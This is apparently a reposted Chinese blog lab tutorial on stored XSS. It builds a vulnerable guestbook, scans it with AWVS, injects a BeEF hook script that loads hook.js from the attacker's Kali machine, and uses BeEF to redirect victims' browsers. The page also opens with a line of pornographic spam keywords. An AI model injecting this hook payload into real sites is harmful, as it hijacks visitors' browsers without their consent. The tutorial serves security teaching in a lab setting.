国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

2年前作者：zzzfff___分類：Toy博客閱讀(24)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

實(shí)驗(yàn)?zāi)康模毫私馐裁词荴SS；了解XSS攻擊實(shí)施，理解防御XSS攻擊的方法

系統(tǒng)環(huán)境：Kali Linux 2、Windows Server

網(wǎng)絡(luò)環(huán)境：交換網(wǎng)絡(luò)結(jié)構(gòu)

實(shí)驗(yàn)工具： Beef；AWVS(Acunetix Web Vulnarability Scanner)

實(shí)驗(yàn)步驟：

實(shí)驗(yàn)環(huán)境搭建。

角色：留言簿網(wǎng)站。存在XSS漏洞；（IIS或Apache、guestbook搭建）

攻擊者：Kali（使用beEF生成惡意代碼，并通過留言方式提交到留言簿網(wǎng)站）；

被攻擊者：訪問留言簿網(wǎng)站，瀏覽器被劫持。

首先攻擊者和被攻擊者需要連接同一個(gè)網(wǎng)絡(luò)。

1.攻擊者打開kali，打開Windows Server2003，二者都需要設(shè)置為橋接模式。

注意要同時(shí)設(shè)置虛擬網(wǎng)絡(luò)適配器為橋接模式

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?文章來源地址http://www.zghlxwxcb.cn/news/detail-436014.html

2.Windows Server2003中需要把guestbook拉入D盤中，如果拉不進(jìn)去，可用u盤協(xié)助，或下載VMare tools（可以去找找這個(gè)怎么下載）。

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器 ?

?3.利用Windows Server2003創(chuàng)建一個(gè)網(wǎng)站

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

找到默認(rèn)網(wǎng)站，右鍵選擇屬性?

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器 ?

?將GuestBook選入 XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?查看ip

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?配置ip

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?添加message.asp

? XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?打開瀏覽器，輸入服務(wù)器ip可看到留言簿網(wǎng)站

?

4.利用AWVS掃描留言簿網(wǎng)站，發(fā)現(xiàn)其存在XSS漏洞

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?一直next直到finish

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?發(fā)現(xiàn)xss漏洞

?

?5.kali輸入beef-xss指令得到惡意代碼（如果沒安裝beef需要先安裝，輸入beef-xss然后根據(jù)提示一直‘y’就好了）

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?惡意代碼為圖中紅框部分，用的時(shí)候是<script src="http://Kali的IP地址:3000/hook.js"></script>，所以需要查看kali的ip

?輸入beef-xss后會(huì)彈出一個(gè)頁面，我們輸入賬號(hào)密碼登錄進(jìn)去

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?

6.訪問http://留言簿網(wǎng)站/message.asp，將惡意代碼寫入網(wǎng)站留言板

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?如果留言被管理員審核通過，你的留言能在留言板顯示出來。當(dāng)客戶端訪問服務(wù)器的留言板后，你可以在Beef控制端查看目標(biāo)主機(jī)，如果出現(xiàn)下圖所示內(nèi)網(wǎng)，表示客戶端瀏覽器已經(jīng)被成功劫持。

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?

?7.在Current Browser項(xiàng)選擇Browser，點(diǎn)擊Hooked Domain選擇Redirect Browser，在右邊的Redirect URL中輸入網(wǎng)址，即可控制瀏覽器跳轉(zhuǎn)到目標(biāo)網(wǎng)址

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?例如，輸入https://www.csdn.net/即可控制受害者的頁面跳轉(zhuǎn)到CSDN官網(wǎng)頁面

XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器

?

?

?

到了這里，關(guān)于XSS攻擊：利用Beef劫持被攻擊者客戶端瀏覽器的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

攻擊者使用 Python 編譯的字節(jié)碼來逃避檢測(cè)
以 PyPI（Python 包索引）等開源包存儲(chǔ)庫為目標(biāo)的攻擊者設(shè)計(jì)了一種新技術(shù)，可以將他們的惡意代碼隱藏在安全掃描器、人工審查和其他形式的安全分析中。在一次事件中，研究人員發(fā)現(xiàn)惡意軟件代碼隱藏在 Python 字節(jié)碼 (PYC) 文件中，該文件可以直接執(zhí)行，而不是源代碼文件由
2024年02月07日
瀏覽(20)
生成式人工智能：網(wǎng)絡(luò)攻擊者手中的破壞性力量
2022 年底，公開可用的生成式人工智能工具的推出使我們進(jìn)入了人類歷史上最大的技術(shù)革命之一。一些人聲稱它的影響與互聯(lián)網(wǎng)、手機(jī)、智能手機(jī)和社交媒體的引入一樣大，甚至更大。這些新的生成式人工智能技術(shù)的采用和發(fā)展速度是我們以前從未見過的。雖然這場(chǎng)人工智能
2024年02月06日
瀏覽(17)
通過蜜罐技術(shù)獲取攻擊者手機(jī)號(hào)、微信號(hào)【網(wǎng)絡(luò)安全】
相關(guān)聲明：以下內(nèi)容僅限用于紅藍(lán)攻防對(duì)抗等專業(yè)領(lǐng)域，請(qǐng)勿用于非法用途。首先，我們先講一下蜜罐的概念，你可以簡(jiǎn)單理解較為蜜罐就是一個(gè)陷阱，故意暴露一些我們?nèi)藶樵O(shè)計(jì)好的漏洞，讓攻擊者自投羅網(wǎng)。蜜罐是對(duì)攻擊者的欺騙技術(shù)，用以監(jiān)視、檢測(cè)、分析和溯源攻
2024年02月12日
瀏覽(13)
危險(xiǎn)的套娃：攻擊者在 PDF 文件中隱藏惡意Word 文檔
據(jù)BleepingComputer消息，日本計(jì)算機(jī)緊急響應(yīng)小組 (JPCERT) 日前分享了在2023 年 7 月檢測(cè)到的利用PDF文檔的新型攻擊——PDF MalDoc攻擊，能將惡意 Word 文件嵌入 PDF 來繞過安全檢測(cè)。 JPCERT采樣了一種多格式文件，能被大多數(shù)掃描引擎和工具識(shí)別為 PDF，但辦公應(yīng)用程序可以將其作為常
2024年02月11日
瀏覽(14)
D-LINK SQL注入漏洞讓攻擊者獲得管理員權(quán)限
D-Link DAR-7000 設(shè)備中發(fā)現(xiàn)了一個(gè)名為 SQL 注入的安全漏洞。 SQL注入是一種惡意攻擊，它利用Web應(yīng)用程序中的漏洞注入惡意SQL語句并獲得對(duì)數(shù)據(jù)庫的未經(jīng)授權(quán)的訪問。此技術(shù)允許攻擊者查看、修改和刪除數(shù)據(jù)庫中的數(shù)據(jù)，這可能對(duì)數(shù)據(jù)的機(jī)密性、完整性和可用性構(gòu)成重大威脅。
2024年02月07日
瀏覽(30)
XSS的利用（包含：藍(lán)蓮花、beef-xss）
dvwa靶場(chǎng) 操作指南和最佳實(shí)踐：使用 DVWA 了解如何防止網(wǎng)站漏洞_dvwa源代碼-CSDN博客 xss漏洞接收平臺(tái) 下載：GitHub - firesunCN/BlueLotus_XSSReceiver 將解壓后的BlueLotus_XSSReceiver原代碼放置 phpstudy 安裝目錄的WWW文件夾下訪問平臺(tái)：http://127.0.0.1/BlueLotus_XSSReceiver/? 改一下密碼，如：admin
2024年01月16日
瀏覽(22)
【burpsuite安全練兵場(chǎng)-客戶端14】點(diǎn)擊劫持-5個(gè)實(shí)驗(yàn)（全）
?? 博主：網(wǎng)絡(luò)安全領(lǐng)域狂熱愛好者（承諾在CSDN永久無償分享文章）。殊榮：CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者，2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名，某廠特邀數(shù)字業(yè)務(wù)安全研究員，edusrc高白帽，vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書，華為云、
2024年02月02日
瀏覽(34)
通過 KernelUtil.dll 劫持 QQ / TIM 客戶端 QQClientkey / QQKey 詳細(xì)教程（附源碼）
前言由于 QQ 9.7.20 版本后已經(jīng)不能通過模擬網(wǎng)頁快捷登錄來截取 QQClientkey / QQKey，估計(jì)是針對(duì)訪問的程序做了限制，然而經(jīng)過多方面測(cè)試，諸多的地區(qū)、環(huán)境、機(jī)器也針對(duì)這種獲取方法做了相應(yīng)的措施，導(dǎo)致模擬網(wǎng)頁快捷登錄來截取數(shù)據(jù)被徹底的和諧，為了解決這個(gè)問題我們
2024年02月02日
瀏覽(17)
【burpsuite安全練兵場(chǎng)-客戶端11】跨站點(diǎn)腳本XSS-20個(gè)實(shí)驗(yàn)（上）
?? 博主：網(wǎng)絡(luò)安全領(lǐng)域狂熱愛好者（承諾在CSDN永久無償分享文章）。殊榮：CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者，2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名，某廠特邀數(shù)字業(yè)務(wù)安全研究員，edusrc高白帽，vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。擅長(zhǎng)：
2024年02月02日
瀏覽(56)
【burpsuite安全練兵場(chǎng)-客戶端11】跨站點(diǎn)腳本XSS-10個(gè)實(shí)驗(yàn)（下）
?? 博主：網(wǎng)絡(luò)安全領(lǐng)域狂熱愛好者（承諾在CSDN永久無償分享文章）。殊榮：CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者，2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名，某廠特邀數(shù)字業(yè)務(wù)安全研究員，edusrc高白帽，vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書，華為云、
2024年02月02日
瀏覽(30)